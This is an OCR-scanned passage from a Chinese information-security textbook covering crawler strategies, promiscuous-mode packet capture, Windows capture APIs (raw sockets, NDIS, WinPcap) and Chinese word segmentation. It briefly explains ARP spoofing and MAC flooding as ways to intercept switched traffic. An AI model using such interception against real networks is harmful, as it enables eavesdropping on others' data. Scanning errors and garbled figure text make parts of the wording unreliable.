面 后 ,该 页 面 将 自己 的 现金 平均 分 配给 其 所 包含 的 链接 页 面 ,并 清空 自己 的 现金 。 最 后 ， 
根据 每 个 页 面 所 拥有 的 现金 值 ,来 决定 待 抓 取 网 页 页 面 的 下 载 顺序 。 

(4) 大 站 优先 搜索 策略 。 考 虑 到 大 型 网 站 的 内 容 质量 大 都 比较 高 ,并 且 通 常 包 含 较 
多 的 页 面 ,对 待 疏 取 的 URL 队列 ,大 站 优先 搜索 策略 优先 下 载 等 待 下 载 页 面 较 多 的 大 型 
网 站 的 页 面 和 链接 。 

总 体 而 言 ,网 络 疏 虫 作为 网 络 信息 内 容 主动 获取 的 一 种 方式 具有 易于 实现 .采集 到 的 
数据 具有 一 定 的 相关 度 且 易于 分 析 。 但 容易 消耗 Web 服务 器 的 服务 资源 ,并 且 采 集 的 数 
据 大 都 是 Web 网 页 数据 ,对 于 即时 通信 信息 .邮件 等 数据 具有 一 定 的 局 限 性 。 
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信息 内 容 被 动 获取 通过 旁 路 侦 听 、 被 动 接受 等 方式 获取 网 络 信息 内 容 。 本 节 以 常见 
的 网 络 数据 捕获 技术 为 例 介 绍 网 络 信息 内 容 被 动 获取 技术 原理 。 相 比 以 网 络 疏 虫 的 信息 
内 容 主动 获取 技术 ,网 络 数据 包 捕 获 能 有 效 捕获 除 Web 之 外 的 更 加 丰富 的 信息 ,并 且 对 
网 络 造成 的 负载 较 少 ,对 正常 网 络 服务 的 影响 较 小 。 

1. 网 卡 工作 模式 

以 太 网 是 DEC Intel 和 Xerox 公司 在 1982 年 联合 公布 的 一 个 标准 ,是 当前 TCP/IP 
采用 的 主要 的 局 域 网 技术 。 以 太 网 是 由 一 条 总 线 和 多 个 连接 在 总 线 上 的 网 络 设备 构成 ， 
基本 的 传输 单元 是 数据 帧 。 通 过 网 卡 采 用 载波 侦 听 /冲突 检测 (CSMAVCD) 的 方式 来 发 
送 数据 。 网 卡 的 硬件 地 址 (MAC 地 址 ) 大 多 数 采用 48 位 ,用 来 唯一 标识 网 络 上 的 设备 。 
在 以 太 网 中 ,所 有 的 通信 方式 都 是 广播 的 , 即 在 同一 网 段 的 所 有 网 卡 均 可 收 到 总 线 上 传输 
的 数据 , 则 可 通过 设置 网 卡 进行 网 络 数据 包 捕获 。 具 体 而 言 , 网 络 数据 包 捕 获 即 是 通过 物 
理 接 入 网 络 的 方式 在 网 络 的 传输 信道 上 获取 数据 。 当 前 ,网 卡 有 4 种 工作 模式 : 

(1) 广播 模式 : 目的 地 址 为 0xFFFFFF ,网 卡 能 够 接收 网 络 中 的 广播 帧 。 

(2) 组 播 模式 : 网 卡 能 够 接收 组 播 数据 。 

(3) 直接 模式 : 只 有 目的 网 卡 才能 接收 该 数据 。 

(4) 混杂 模式 : 网 卡 能 够 接收 一 切 通过 它 的 数据 ,而 不 管 该 数据 是 否 是 传 给 它 。 

在 系统 正常 工作 情况 下 ,网卡 只 响应 目标 地 址 与 自己 MAC 地 址 相 匹配 的 数据 帧 以 
及 目的 地 址 是 广播 地 址 的 数据 帧 ,其余 情况 的 数据 帧 都 将 被 丢弃 。 为 此 ,在 开始 捕获 网 卡 
上 传输 的 数据 包 之 前 ,需要 将 网 卡 工作 模式 设置 为 混杂 模式 。 在 该 模式 下 ,对 收 到 的 每 一 
个 数据 帧 都 产生 中 断 ,使 得 操作 系统 能 直接 访问 数据 链 路 层 捕获 相关 的 数据 。 

2. 网 络 数 据 包 捕获 原理 

数据 包 捕获 机 制 主要 由 最 底层 针对 具体 操作 系统 的 包 捕 获 机 制 、 包 过 滤 机 制 和 最 高 
层 的 用 户 程 序 接口 组 成 。 不 同 操作 系统 所 对 应 的 最 底层 的 包 捕获 机 制 有 所 不 同 ,具体 将 
在 下 一 节 介绍 。 从 形式 上 看 ,数据 包 都 是 经 网 卡 、 设 备 驱动 层 、 数 据 链 路 层 、IP 层 、 传 输 
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层 \ 最 后 传送 给 应 用 程序 。 最 底层 的 包 捕 获 机 制 是 在 数据 链 路 层 增加 一 个 旁 路 处 理 , 对 发 
送 和 接收 的 数据 包 做 过 滤 和 缓冲 等 相关 处 理 ; 包 过 滤 机 制 按照 用 户 的 需求 ,对 捕获 的 数据 
包 进 行 筛 选 ,将 满足 条 件 的 数据 包 发 送 给 应 用 程序 :对 用 户 程序 而 言 , 包 捕获 机 制 提供 了 
统一 的 程序 接口 ,用 户 可 通过 调用 相应 的 函数 捕获 相应 的 数据 包 。 

在 底层 包 捕 获 机 制 方面 ,以 太 网 中 不 同 的 信息 交换 方式 使 得 网 络 数据 捕获 的 处 理 方 
式 不 同 , 可 分 为 : 

(1) 共享 式 以 太 网 网 络 数据 包 捕 获 。 共 享 式 以 太 网 通过 共用 一 条 总 线 或 集线器 实现 
网 络 互联 ,典型 的 代表 是 使 用 10Base2 或 10Base5 的 总 线 型 网 络 和 以 集线器 为 核心 的 
10Base-T 星 型 网 络 。 集 线 器 工作 在 物理 层 , 实 现 对 网 络 的 集中 管理 ,同时 对 接收 到 的 信 
号 进行 再 生 、 整 形 和 放大 ,以 扩大 传输 距离 。 本 质 上 ,以 集线器 为 核心 的 以 太 网 和 总 线 型 
以 太 网 没有 区 别 。 通 过 集线器 连接 的 每 个 网 络 设备 均 能 收 到 所 有 的 数据 。 因 此 ,将 任意 
一 台 设 备 的 网 卡 设置 为 混杂 模式 , 则 可 监听 同一 网 络 内 所 有 设备 发 送 的 数据 ,达到 网 络 数 
据 捕获 的 目的 。 

(2) 交换 式 以 太 网 网 络 数据 包 捕 获 。 交 换 式 以 太 网 通过 交换 机 连接 网 内 各 设备 , 交 
换 机 通过 每 个 端口 发 送 来 的 数据 帧 ,形成 源 MAC 地 址 和 端口 对 应 MAC 地 址 表 , 当 一 个 
新 的 数据 帧 到 达 交 换 机 时 ,根据 目的 MAC 地址 查找 这 张 MAC 地 址 表 并 转发 到 相应 的 
端口 。 可 见 ,交换 式 以 太 网 中 只 有 目标 端口 的 设备 能 接收 到 相应 的 数据 包 。 在 广播 模式 
下 ,数据 帧 将 发 往 所 有 的 端口 。 可 见 , 交 换 机 端口 隔离 了 网 络 设备 之 间 数 据 帧 的 传输 , 限 
制 了 通过 侦 听 来 捕获 数据 的 功能 。 因 此 ,实现 交换 式 以 太 网 中 网 络 数据 包 捕 获 的 典型 方 
法 包括 端口 镜像 .ARP 欺骗 和 MAC 洪 泛 等 。 简 单 而 言 ,端口 镜像 即 是 将 一 个 端口 的 流 
量 自动 复制 到 另 一 个 端口 ;ARP 欺骗 是 分 别 向 目标 设备 和 网 关 发 送 ARP 包 , 欺 骗 目标 设 
备 和 网 关 刷 新 本 地 的 IP-MAC 对 应 表 , 使 得 所 有 数据 包 都 经 过 监听 设备 ;MAC 洪 泛 指 当 
交换 机 设备 的 内 存 耗 尽 时 候 , 便 向 连接 的 所 有 链 路 发 送 数据 包 。 

本 节 主 要 介绍 共享 式 以 太 网 网 络 数据 包 捕 获 , 即 在 将 网 卡 设置 为 混杂 模式 后 ,在 
Windows 平台 下 的 网 络 数据 捕获 方法 。 

3. 基于 Windows 的 网 络 数据 捕获 方法 

在 Windows 操作 系统 下 ,网 络 数据 包 捕获 方法 有 : 基于 原始 套 接 字 、 基 于 NDIS 驱 
动 程序 、 基 于 WinPcap 等 。 

1) 基于 原始 套 接 字 (Raw Socket) 的 网 络 数据 捕获 

应 用 层 通过 传输 层 进行 数据 通信 时 ,存在 多 个 应 用 程序 并 发 使 用 TCP 或 UDP 的 情 
况 。 为 有 效 区 分 不 同 应 用 程序 和 连接 ,计算 机 系统 为 应 用 程序 和 TCP/IP 之 间 的 协议 交 
互 提供 了 称 为 套 接 字 (Socket) 的 接口 。 套 接 字 地 址 由 IP 地 址 与 端口 号 来 唯一 确定 ,其 中 
IP 地 址 用 于 找到 目的 主机 ,端口 号 用 来 标识 进程 , 即 同一 主机 上 不 同 应 用 程序 由 不 同 的 
端口 号 来 确定 。 创 建 一 个 套 接 字 需 要 三 个 参数 : 目的 IP, 传 输 层 使 用 的 协议 (TCP 或 
UDP) .端口 号 。 当 前 , 套 接 字 分 为 三 种 类 型 : @ 流 式 套 接 字 (SOCK_STREAM) : 是 一 种 
面向 连接 的 套 接 字 ,对 应 于 TCP 应 用 程序 ;@ 数 据 报 套 接 字 (SOCK_DGRAM): 是 一 种 
无 连接 的 套 接 字 ,对 应 于 UDP 应 用 程序 ;@ 原 始 套 接 字 (SOCK_RAW): 是 一 种 能 直接 对 
IP 数据 包 进行 处 理 的 套 接 字 ,能 完成 流 式 套 接 字 和 数据 套 接 字 不 能 完成 的 功能 。 如 捕获 
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和 创建 IP 数据 包 等 。 通 过 使 用 原始 套 接 字 实现 网 络 数据 捕获 ,其 具体 流程 图 如 图 10-5 
所 示 。 


初始 化 原始 套 接 字 


是 
创建 原始 套 接 字 


捕获 原始 数据 包 
下 
1 
获取 本 机 名 及 IP 地 址 分 析 原始 数据 包 
1 
显示 捕获 的 数据 包 
是 


设置 网 卡 为 混杂 模式 一 一 是 
否 


一 一 错误 信息 提示 
图 10-5 基于 原始 套 接 字 的 网 络 数据 捕获 流程 


在 创建 原始 套 接 字 之 前 ,需要 调用 WSAStartup 函数 实现 套 接 字库 的 初始 化 。 然 后 
可 利用 函数 socket() 或 WSASocket() 来 创建 套 接 字 。 这 两 种 方法 都 可 以 创建 一 个 套 接 
字 , 不 同 之 处 在 于 WSASocket 函数 具有 重 倒 1/O 功能 , 即 发 送 和 接收 数据 操作 可 以 被 多 
次 调用 ;而 socket 函数 只 能 发 过 之 后 等 待 响应 消息 后 才 可 做 下 一 步 操作 。 在 此 基础 上 ， 
通过 bind 函数 将 创建 好 的 原始 套 接 字 与 网 卡 进行 绑 定 :要 利用 原始 套 接 字 捕 获 网 络 数据 
包 , 还 需要 通过 函数 ioctlsocket 或 WSAIoctl 将 网 卡 设置 为 混杂 模式 ,其 中 WSAIoctl 函 
数 是 在 Winsock2 中 将 ioctlsocket 函数 中 的 argp 参数 分 解 成 一 系列 输入 函数 。 若 网 卡 的 
混杂 模式 设置 成 功 , 则 返回 0; 否则 可 通过 WSAGetLastError 函数 返回 相应 的 错误 提示 
消息 。 最 后 可 以 捕获 到 流 经 网 卡 的 所 有 数据 包 , 并 进行 进一步 地 分 析 和 显示 等 功能 ,直到 
程序 终止 。 

2) 基于 NDIS 中 间 了 驱动 的 网 络 数据 捕获 

网 络 驱 动 接 口 规范 (Network Driver Interface Specification, NDIS) 的 早期 版 本 是 由 
Microsoft 和 3COM 公司 联合 开发 , 现 主要 用 于 Windows 平台 。NDIS 定义 了 网 卡 或 网 
卡 驱动 程序 与 上 层 协议 驱动 程序 之 间 的 通信 接口 规范 ,屏蔽 了 底层 物理 硬件 的 差异 性 ,使 
得 上 层 协议 驱动 程序 可 以 以 一 种 与 设备 无 关 的 方式 与 网 卡 驱动 程序 进行 通信 。NDIS 横 
跨 传输 层 、 网 络 层 和 数据 链 路 层 ,支持 三 种 网 络 驱 动 程序 : 微 端口 (网 卡 ) 驱动 程 序 
(Miniport Driver) ; 传输 协议 驱动 程序 (Protocol Driver) ,如 TCP/IP 协议 栈 ; 中 间 层 驱动 


(Intermediate Driver) ,位 于 微 端口 驱动 程序 和 传输 协议 驱动 程序 之 间 , 各 个 驱动 层 之 间 
的 结构 关系 如 图 10-6 所 示 。 


应 用 层 
| 用 户 模式 
内 核 模式 
协议 驱动 程序 
t 
中 间 驱 动 程序 
4 NDIS 
T 下 库 
微 端口 驱动 程序 
1 1 
网 卡 网 卡 


图 10-6 NDIS 层次 结构 


微 端口 驱动 程序 通过 NDIS 库 向 下 与 底层 网 卡 进行 通信 ,向 上 与 中 间 驱 动 程序 或 协 
议 驱动 程序 交互 。NDIS 库 提供 了 函数 集 NdisXxx 封装 了 微 端口 需要 调用 的 操作 系统 函 
数 , 同 时 对 外 提供 了 入 口 函数 集 MiniportXxx。 中 间 驱 动 程序 要 实现 与 下 层 的 微 端口 驱 
动 程序 和 上 层 的 协议 驱动 程序 之 间 的 通信 过 程 : 四 向 下 提供 了 协议 人 库 点 函数 集 
ProtocolXxx, NDIS 调用 这 些 函 数 传递 下 层 微 端口 的 请 求 ; @ 向 上 提供 了 微 端口 入 口 函 
数 集 MiniportXxx， NDIS 通过 调用 这 些 函 数 实现 与 协议 驱动 程序 通信 。 因 此 ,对 于 上 层 
的 驱动 ,其 是 微 端口 驱动 程序 ;对 于 底层 的 驱动 程序 ,其 是 协议 驱动 程序 。 协 议 驱 动 程序 
是 NDIS 层次 结构 的 最 高 层 , 但 被 当 作 传 输 层 协议 的 传输 驱动 程序 的 最 底层 : 四 向 下 与 
中 间 驱 动 程序 和 微 端口 驱动 程序 交互 ,将 用 户 发 来 的 数据 复制 到 数据 包 中 ,然后 通过 调用 
函数 集 NdisXxx 将 数据 包 发 送 给 中 间 驱 动 程序 或 微 端口 驱动 程序 ;同时 协议 驱动 程序 也 
提供 了 一 套 入 口 点 函数 集 ProtocolXxx, 用 来 接收 由 底层 传 来 的 数据 包 ; @@ 向 上 提供 了 一 
个 传输 驱动 程序 接口 TDI, 用 来 与 上 层 的 应 用 层 进行 交互 。 

总 体 而 言 ,中 间 层 驱动 程序 对 上 层 协议 驱动 程序 表现 为 一 个 虚拟 的 微 端口 网 卡 驱动 
(Miniport Driver) ,对 下 层 的 微 端口 驱动 程序 表现 为 一 个 协议 驱动 (Protocol Driver) 。 所 
有 经 过 网 卡 发 送 到 网 络 和 从 网 络 接收 的 数据 包 都 要 经 过 中 间 驱 动 程序 ,因此 在 此 处 可 以 
实现 数据 包 的 捕获 。 具 体 的 方法 下 : 

首先 ,通过 DriverEntry 函数 调用 NdisMInitializeWrapper 函数 使 得 微 端口 驱 动 和 
NDIS 相 联 系 ,返回 设备 句柄 NdisWrapperHandle; 然后 ,利用 该 句柄 调用 NdisIMRegister- 
LayeredMiniport 函数 为 NDIS 中 间 层 驱动 程序 注册 回调 函数 集 MiniprtXxx, 使 得 上 层 协 
议 将 其 当 作 是 网 卡 ,并 通过 NDIS 库 调 用 这 些 回调 函数 ;最 后 ,调用 NdisRegisterProtocol 
函数 为 中 间 驱 动 程序 注册 回调 函数 集 ProtocolXxx, 使 得 下 层 网 卡 将 其 当 作 是 一 个 协议 ， 
并 通过 NDIS 库 调 用 这 些 回 调 函 数 。 
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当 底 层 网 络 有 数据 到 达 时 ,将 触发 中 断 ,通过 调用 NdisMIndicateReceivePacket 函数 
接收 数据 包 , 并 放 入 微 端口 驱动 的 缓冲 区 中 , 当 接 受 的 数据 达到 一 定数 量 时 , 微 端 口 驱 动 
会 告知 NDIS 新 数据 的 到 来 ,此 时 ,将 触发 NDIS 中 间 驱 动 程序 调用 Protocol- 
ReceivePacket 函数 来 接收 数据 包 , 之 后 ,可 以 再 次 请 求 NDIS 告知 协议 驱动 程序 来 接收 数 
据 。 可 见 ,在 NDIS 中 间 驱 动 程序 即 可 以 实现 对 网 络 数据 包 的 捕获 和 处 理 。 

3) 基于 WinPcap 的 网 络 数据 捕获 

WinPcap( Windows Packet Capture) 是 Windows 平台 下 的 一 个 免费 的 网 络 访问 系统 ,可 
在 其 官网 上 下 载 相应 的 版 本 。WinPcap 是 UNIX 系统 下 Libpcap 在 Windows 下 的 移植 , 屏 
蔽 了 不 同 Windows 系统 的 差异 ,主要 用 来 提供 底层 原始 网 络 数 据 包 捕获 、 过 滤 \ 发 送 和 分 析 
等 功能 ,广泛 应 用 于 网 络 协议 分 析 、 流 量 监控 \ 安 全 扫描 和 入 侵 检测 等 方面 。 

WinPcap 体系 结构 由 三 部 分 组 成 : 内 核 态 下 的 网 络 组 包 过 滤器 (Netgroup Packet 
Filter, NPF)、 用 户 态 下 的 低级 动态 链接 库 Packet. dll 和 高 级 系统 无 关 动态 链接 库 
Wpcap. dll, 具 体 如 图 10-7 所 示 。 


已 
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用 户 态 | 3. 调 用 Wpcap.dll 
Packetdll | 


过 滤器 统计 引擎 || 转 储 引 擎 


协 
a 网 络 数 据 入 口 点 存储 到 硬盘 基 


数据 链 路 层 驱动 程序 


图 10-7 WinPcap 内 部 结构 


上 一 节 中 介绍 的 NDIS 主要 实现 上 层 协 议 驱动 程序 以 一 种 与 设备 无 关 的 方式 与 网 卡 
驱动 程序 进行 交互 。 网 络 组 包 过 滤器 NPF 即 被 实现 为 一 个 协议 驱动 程序 ,是 WinPcap 
的 核心 。 为 了 捕获 网 络 上 的 原始 数据 包 , 其 绕 过 了 操作 系统 的 协议 栈 , 直 接 与 网 卡 驱 动 程 
序 交 互 。 主 要 实现 从 网 卡 驱动 程序 收集 网 络 数据 包 ,转发 给 过 滤器 进行 过 滤 ,也 可 以 发 送 
给 统计 引擎 进行 网 络 统计 分 析 , 还 可 以 发 送 到 转 存 器 ,将 网 络 数据 包 存 储 到 磁盘 。NPF 
与 操作 系统 有 关 ,在 Win95/98/ME 系统 中 ,以 VxD 文件 存在 ;在 Windows NT/2000 中 ， 
以 SYS 文件 存在 。 两 个 动态 链接 库 Packet. dll 和 Wpcap. dll 均 工作 在 用 户 态 , 其 中 低级 
动态 链接 库 Packet. dll 用 来 屏蔽 不 同 Windows 版 本 中 用 户 态 和 内 核 态 之 间接 口 的 差异 ， 


第 10 章 ， 信 息 内 容 安全 


为 Windows 平台 提供 一 个 能 直接 访问 NPF 且 与 系统 无 关 的 公共 接口 。 高 级 系统 无 关 动 
态 链接 库 Wpcap. dll 是 一 个 独立 于 底层 驱动 程序 和 操作 系统 更 加 高 层 的 编程 接口 。 用 户 
既 可 以 使 用 包含 在 Packet. dll 中 的 低级 函数 直接 进入 内 核 级 调用 ,也 可 以 使 用 由 Wpcap. 
dll 提供 的 高 级 函数 调用 ,但 应 用 程序 调用 Wpcap. dll 函数 时 ,Packet. dll 中 的 函数 也 会 
被 自动 调用 。 

利用 WinPcap 实现 网 络 数据 包 捕 获 主要 是 通过 调用 Wpcap. dll 和 Packet. dll 中 提 
供 的 API 函数 实现 ,具体 流程 如 图 10-8 所 示 。 首 先 通过 调用 函数 pcap_findalldevs 来 获 
取 网 络 设备 列表 ,得 到 设备 的 基本 信息 。 然 后 ,通过 调用 函数 pcap_open_live 来 打开 指定 
的 网 卡 设备 ,设置 网 卡 的 工作 模式 为 混杂 模式 。 在 此 基础 上 ,通过 函数 pcap_compile 和 
pcap_setfilter 的 配合 ,可 实现 满足 用 户 需 求 的 数据 包 过 滤 , 其 中 pcap_compile 函数 将 一 
个 高 层 的 布尔 过 滤 表 达 式 编译 成 一 个 能 够 被 过 滤 引 擎 所 解释 的 低层 的 字 节 码 ; pcap_ 
setfilter 函数 将 一 个 过 滤器 与 内 核 捕 获 会 话 相关 联 。 通 过 调用 pcap_setfilter 函数 ,过 滤 
器 将 应 用 于 网 络 的 所 有 数据 包 , 只 有 符合 要 求 的 数据 包 才 被 传送 给 应 用 程序 。 最 后 进行 
数据 包 的 捕获 ,WinPcap 提供 了 多 种 网 络 数 据 包 捕获 函数 ,有 的 基于 回调 机 制 ,如 pcap_ 
loop() ,有 的 采用 直接 方式 ,如 pcap_next_ex()。 


(开始 ) 


1 
获取 网 络 设备 列表 
pcap_findalldevs() 


打开 指定 网 卡 设备 ,设置 混杂 模式 
pcap_open_liveO) 


1 
编译 过 滤器 


peap_compile() 


Y 
设置 过 滤器 
pcap_setfilter() 


1 
捕获 数据 包 


pcap_next_ex() 


捕获 结束 ? 处 理 数据 包 


1 
关闭 网 络 设备 
pcap_freealldevs() 


图 10-8 基于 WinPcap 网 络 数据 包 捕获 流程 


信息 安全 导论 


10.3 信息 内 容 识 别 与 分 析 


在 获取 网 络 信息 内 容 的 基础 上 ,需要 对 信息 内 容 进行 识别 和 分 析 ,判断 信息 内 容 的 合 
法 性 。 根 据 信 息 内 容 的 类 型 ,本 节 主 要 以 文本 和 图 像 两 个 方面 为 例 ,介绍 信息 内 容 的 识别 
与 分 析 技 术 ,为 后 面 对 信息 内 容 进行 控制 和 管理 黄 定 基础 。 


1031 文本 内 容 识 别 与 分 析 


当前 ,信息 内 容 大 都 表现 为 半 结 构 化 或 非 结构 化 的 电子 文本 形式 ,如 网 页 .邮件 、 新 
闻 、 短 信 等 。 在 对 文本 内 容 分 析 之 前 ,首先 介绍 文本 数据 、 文 本 信息 和 文本 知识 的 概念 : 

定义 10.1 文本 数据 (Textual Data,TD): 面向 人 的 ,可 以 被 人 部 分 理解 ,但 不 能 为 
人 所 利用 ,具有 自然 语言 固有 的 模糊 性 与 歧义 性 。 

定义 10.2 文本 信息 (Textual Information ,TI) : 面向 机 器 的 ,将 隐 含 在 文本 数据 的 
关系 以 显 式 的 方式 展现 给 用 户 , 具 有 无 歧义 性 、 显 性 关系 等 特点 。 

定义 10.3 文本 知识 (Textual Knowledge,TK): 对 文本 信息 进行 处 理 得 到 有 意义 
的 模式 ,对 人 来 说 是 可 理解 的 和 有 用 的 。 

可 见 ,通过 信息 获取 技术 得 到 的 原始 文本 要 用 于 信息 处 理 , 必 须 通 过 文本 预 处 理 技术 
实现 文本 数据 到 文本 信息 的 转换 ,将 文本 由 面向 人 的 转换 为 面向 机 器 可 识别 的 信息 。 一 
般 地 ,文本 内 容 预 处 理 包括 : 文本 分 词 、 去 停 用 词 、 文 本 表示 和 特征 提取 四 个 步 又 ,如 
图 10-9 所 示 。 经 过 预 处 理 后 ,原始 文本 数据 从 一 个 半 结 构 化 或 非 结 构 化 转化 为 结构 化 的 
计算 机 可 识别 的 文本 信息 , 即 对 文本 进行 抽象 ,建立 数学 模型 ,用 来 描述 和 替代 原始 文本 ， 
使 得 计算 机 能 够 通过 该 对 模型 的 计算 和 操作 实现 对 文本 的 识别 。 由 此 可 见 , 该 过 程 为 后 
续 文 本 知识 发 现 葛 定 了 基础 。 


| 文本 分 闻 上 ~| 去 停 用 词 | ~| 文本 表示 | 一 | 特征 提取 
图 10-9 文本 预 处 理 过 程 


1. 文本 分 词 

文本 分 词 处 理 对 象 包括 英文 文本 和 中 文 文本 两 类 ,其 中 词 是 最 小 的 、 可 独立 运用 的 、 
有 意义 的 语言 单位 。 

在 英文 文本 分 词 中 ,单词 被 当 作 基 本 处 理 单元 ,单词 与 单词 之 间 通 过 空格 隔 开 ,因此 
最 为 简单 的 方法 是 使 用 空格 与 标点 作为 分 隔 符 。 在 中 文 文本 分 词 中 , 字 作 为 基本 书写 单 
元 , 字 与 字 连 接 起 来 形成 词 来 表达 意思 。 然 而 ,中 文 文本 中 的 分 隔 符 (,: 。!? 等 ) 一 般 用 
来 分 割 短语 或 句子 , 词 与 词 之 间 没 有 明显 的 分 隔 符 。 因 此 ,中文 分 词 即 是 将 中 文 连续 的 字 
序列 按照 一 定 规范 重新 组 合成 有 意义 的 词 序列 的 过 程 。 对 文本 进行 有 效 的 分 词 是 实现 人 
与 计算 机 沟通 的 基础 ,也 是 文本 内 容 处 理 的 基础 。 目 前 ,文本 分 词 技术 已 经 广泛 应 用 于 信 
息 检 索 ,文本 挖掘 \ 机 器 翻译 .语音 识别 等 领域 。 

当前 ,中文 分 词 面临 了 两 个 主要 问题 : 歧义 识别 和 未 登录 词 识别 。 

(1) 歧义 识别 问题 。 中 文 分 词 歧义 主要 包括 交叉 型 歧义 和 组 合 型 歧义 ,其 中 交叉 型 
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歧义 指 两 个 相 邻 的 词 之 间 有 重 全 的 部 分 ,例如 对 于 字 串 ABC, 如 果 其 子 串 AB、BC 分 别 为 
两 个 不 同 的 有 意义 的 词 ,那么 对 ABC 进行 切 分 , 既 可 以 切 分 成 AB/C, 也 可 以 切 分 成 
A/BC, 则 称 ABC 存在 交叉 型 歧义 ;组 合 型 歧义 是 指 某 个 词组 其 中 的 一 部 分 也 是 一 个 完 
整 的 有 意义 的 词 ,例如 对 字符 串 AB, 如 果 AB 组 合 起 来 是 一 个 词 , 同 时 其 子 串 A、B 单独 
切 分 开 也 成 为 有 意义 的 词 , 则 称 AB 存在 组 合 型 歧义 。 

(2) 未 登录 词 识别 问题 。 分 词 的 好 坏 依赖 于 词典 所 录 的 词 的 多 少 。 在 语言 的 发 展 和 
变化 中 会 出 现 很 多 新 词 ,同时 词 的 衍生 现象 也 很 普遍 ,因此 任何 一 个 词典 都 不 可 能 包含 所 
有 的 词 。 未 登录 词 是 指 没有 加 入 分 词 词典 而 实际 文本 中 存在 的 词汇 。 一 般 而 言 ,未 登录 
词 大 致 包含 两 类 : 一 类 是 专 有 名 词 , 如 人 名 、 地 名 、 产 品名 、 简 称 等 ; 男 一 类 是 新 出 现 的 通 
用 词汇 和 专业 用 语 ,如 神 马 、 给 力 等 。 

为 解决 上 述 两 个 挑战 ,常见 的 中 文 分 词 技 术 可 分 为 : 

(1) 基于 字符 串 匹 配 的 分 词 方 法 。 基 于 字符 串 匹 配 的 分 词 方 法 又 称 机 械 分 词法 , 基 
本 思想 : 首先 建立 词典 ,一 般 用 汉字 字典 ,然后 对 于 给 定 的 待 分 词 的 汉字 串 S, 按 照 一 定 
的 扫描 规则 ( 正 向 /逆向 ) 取 S 的 子 串 ,最 后 按照 一 定 的 匹配 规则 将 此 子 串 与 词典 中 的 某 词 
条 进行 匹配 。 若 成 功 , 则 该 子 串 是 词 ,继续 分 割 剩余 的 部 分 ,直到 剩余 部 分 为 空 ;否则 ,该 
子 串 不 是 词 , 则 取 S 的 子 串 进行 匹配 。 可 见 , 按 照 扫描 方向 可 分 为 正 向 匹配 和 逆向 匹配 ; 
按照 不 同 长 度 优先 分 配 可 分 为 最 大 匹配 法 和 最 小 匹配 法 。 

目前 常见 的 实现 方法 有 正 向 最 大 匹配 法 . 道 向 最 大 匹配 法 、 最 少 切 分 分 词法 和 双向 匹 
配 法 。 这 里 本 节 以 正 向 最 大 匹配 法 为 例 介 绍 基于 字符 串 匹配 的 分 词 方法 ,逆向 最 大 匹配 
法 的 思想 与 之 类 似 ,只 不 过 扫描 规则 是 逆向 的 ,双向 匹配 法 即 是 这 两 种 方法 的 结合 ,最 小 
切 分 分 词法 是 使 每 一 句 中 切 出 的 词 数 最 小 。 

基于 上 面 的 介绍 ,可 以 看 出 基于 字符 串 正 向 最 大 匹配 分 词 方法 是 按照 从 左 到 右 的 正 
向 规则 将 待 分 词 的 汉字 串 S 中 的 几 个 连续 字符 与 词典 中 的 词 进行 匹配 , 若 成 功 , 则 并 不 是 
马上 切 分 出 来 ,而 是 继续 进行 匹配 ,直到 下 一 个 扫描 不 是 词典 中 的 词 才 进行 词 的 切 分 ,从 
而 保证 了 词 的 最 大 匹配 。 一 般 地 ,可 通过 增 字 匹 配 法 或 减 字 匹 配 法 来 实现 。 若 词典 中 最 
长 词 的 长 度 是 MaxLen, 这 里 以 减 字 匹 配 法 为 例 说 明基 于 字符 串 正 向 最 大 匹配 分 词 方 法 
的 实现 过 程 , 详 细 流 程 如 图 10-10 所 示 。 

可 见 , 利 用 最 大 匹配 法 进行 中 文 分 词 实现 简单 ,分 词 速 度 也 比较 快 ;但 是 分 词 的 精度 
依赖 于 词 , 若 词 长 过 短 ,长 词 就 会 被 切 错 ; 词 长 过 长 ,查找 效率 降低 。 此 外 ,也 不 能 发 现 交 
叉 型 歧义 ,如 ,以 汉字 字典 为 词典 ,利用 正 向 最 大 匹配 法 和 逆向 最 大 匹配 法 对 * 小 组 合 解 
散 ” 进 行 分 词 ,得 到 的 结果 为 :“ 小 组 / 合 / 解 散 ” 和 “小 /组 合 / 解 散 ”。 

(2) 基于 统计 的 分 词 方法 。 这 类 方法 主要 考虑 词 是 稳定 的 字 的 组 合 , 即 在 上 下 文中 ， 
相 邻 字 之 间 同 时 出 现 的 次 数 越 多 ,就 越 可 能 构成 一 个 词 , 故 可 以 计算 文本 中 相 邻 出 现 的 各 
个 字 的 组 合 频率 ,计算 它们 互 现 信息 ,并 以 此 来 判断 它们 组 合成 一 个 词 的 可 信和 度 。 字 与 字 
之 间 互 现 信息 的 高 低 直 接 反 映 了 这 些 字 之 间 的 紧密 程度 。 当 紧密 程度 高 于 某 一 冰 值 时 ， 
即 可 认为 此 字 组 可 能 构成 了 一 个 词 。 

由 此 可 见 ,这 种 方法 只 需要 对 语 料 中 字 的 组 合 频 度 进行 统计 ,不 需要 基于 切 分 词 
典 , 因 而 又 叫做 无 词典 分 词法 或 统计 取 词 方法 。 具 体 的 统计 方法 可 采用 N-gram、 隐 
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开始 


1 
读 入 词典 文件 和 待 处 理 中 文 
字 申 S 


1 
初始 化 最 大 词 长 MaxLen 和 
输出 词 申 S， 


取 也 Si 左边 的 W 个 字符 ,W 的 
长 度 不 能 大 于 MaxLen 


Se 类 到 断 W 是 否 在 词典 中 
人 


否 


去 掉 W 最 右边 的 一 个 字 


是 否 
W 是 否 为 单字 


图 10-10 基于 字符 串 正 向 最 大 匹配 分 词 方法 的 实现 过 程 


Markov 模型 和 最 大 精 模型 等 ,这 里 不 做 详细 介绍 。 然 而 ,这 种 方法 经 常 抽出 一 些 共 现 
频 度 高 .但 并 不 是 词 的 常用 字 组 ,例如 * 之 一 "“ 有 的 “我 的 ?等 ,可 见 , 该 方法 对 常用 
词 的 识别 精度 差 。 此 外 ,由 于 需要 统计 语 料 中 字 的 组 合 频率 ,因而 带 来 的 时 空 开 销 也 
比较 大 。 

(3) 基于 理解 的 分 词 方法 。 这 类 方法 的 基本 思想 是 在 分 词 中 考虑 句法 和 语义 信息 ， 
利用 句法 信息 和 语义 信息 来 消除 歧义 。 也 就 是 说 ,这 种 方法 是 通过 计算 机 模拟 人 对 句子 
的 理解 实现 中 文 分 词 过 程 。 一 般 地 ,该 方法 由 分 词 子 系统 、 句 法 语义 子 系统 、 总 控 部 分 组 
成 。 在 总 控 部 分 的 协调 下 ,分 词 子 系统 可 以 从 句法 语义 子 系统 那里 获得 有 关 对 词 ,句子 等 
的 句法 和 语义 信息 ,从 而 能 有 效 解决 分 词 过 程 中 的 歧义 问题 。 

